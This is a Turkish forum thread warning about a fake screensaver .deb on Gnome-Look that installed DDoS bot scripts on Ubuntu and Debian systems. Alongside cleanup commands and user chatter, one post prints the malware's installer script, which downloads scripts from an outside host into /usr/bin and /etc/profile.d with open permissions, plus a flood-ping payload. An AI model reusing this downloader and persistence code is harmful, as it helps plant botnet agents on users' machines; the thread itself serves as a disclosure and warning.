




Piyasada Linux Malware"Leri Kol Gezmeye Başlamış - Aman Dikkat!
-
Gnome-Look'ta ekran koruyucu olduğu iddia edilen bir .deb dosyasının içinde zararlı yazılım bulundu. Bu zararlı yazılımın DDoS saldırıları için sistemde bir ajan işlevi gördüğü ortaya çıktı. Ubuntu ve diğer Debian tabanlı işletim sistemleri de bu yazılımdan etkileniyor.
Söz konusu .deb dosyası sözde şelaleli bir ekran koruyucusu. Bu program yüklenme işlemi sırada, bir ekran koruyucusu kurmak yerine çeşitli betikler indirip onlara izinler atamakta. Betik kendi kendini yenileyecek şekilde tasarlanmış ve muhtemelen sistemi DDoS saldırılarında kullanma amacı gütmekte.
Bahsi geçen "ekran koruyucusu" şu an Gnome-Look'tan silindi. Bu hadise bizlere tıpkı Windows'ta olduğu gibi Linux kullanıcılarının da resmi depolar ve güvenilir PPA'lar harici yerlerden yazılım yüklerken dikkatli olmadıkları taktirde zararlı yazılımlardan etkilenebileceği gerçeğini göstermiştir.
Düzeltme
Eğer bu yazılımı yüklemiş iseniz, alttaki komutları komut satırına vererek bu zararlı yazılımı temizleyebilirsiniz.
sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash
sudo dpkg -r app5552
Daha fazla yardım için Ubuntu Forum'a göz atın.
UYARI: "Ninja Black" isimli Gnome temasının da zararlı yazılım barındırdığı düşünülmektedir.
---
Kaynak: http://digitizor.com/2009/12/10/ubuntu-malware-for-ddos-attack-found-in-screensaver/?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+digitizor+%28Digitizor%29&utm_content=Gmail
-
Yani ha win serileri ha linux serileri bir sekilde programlamadan kodlardan cakmayan, her sekilde tehdit altında.
-
Bu da söz konusu zararlı yazılım betiği:
#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exitBu betik ise basitçe şu betiği indirip çalıştırıyormuş:
ping -s 65507 www.mmowned.com
Ubuntu Forumu'ndaki eleman çakmasa çok kötü sonuçlar doğabilirdi. Ben de Gnome-Look'tan paldır küldür tema çekerdim...
-
Uyarmak açısından up!
-
Neyse ki windows'ta böyle bir sorunumuz yok :)
-
allah linuxcuları korusun :|
-
Linux güvenli diyorduk o da mı yalan oluyor :|
-
Botnet olmak gibi.Dosyalara zarar verilmesi veri çalınması gibi birşey söz konusu değil.Açık kaynak olunca hemen farkediliyor böyle.
-
linux u kendi serverinden indirip bilmediğin uygulama yüklemezsen bişey olmaz...
-
sağolasın.
Abi bazıları linux güvenli değil mi falan demiş.Windowsta olduğu için şükretmiş :-/
Linuxta windowsa göre daha güvendesiniz.Virüs konusunda, zombi olma konsuunda vs..TAbi ki linuxtada çok kritik açıklar vs. olabilir.Yada virüsler olabilir.FAkat kaç linuxçu virüsler yüzünden format atmıştır ? Bu günlerde bilmek istediğim bir konu.
-
illegal66 bunu yazdı:
-----------------------------
linux u kendi serverinden indirip bilmediğin uygulama yüklemezsen bişey olmaz...
-----------------------------katılıyorum arkadaşa linux kullanmasamda her zaman desteklerim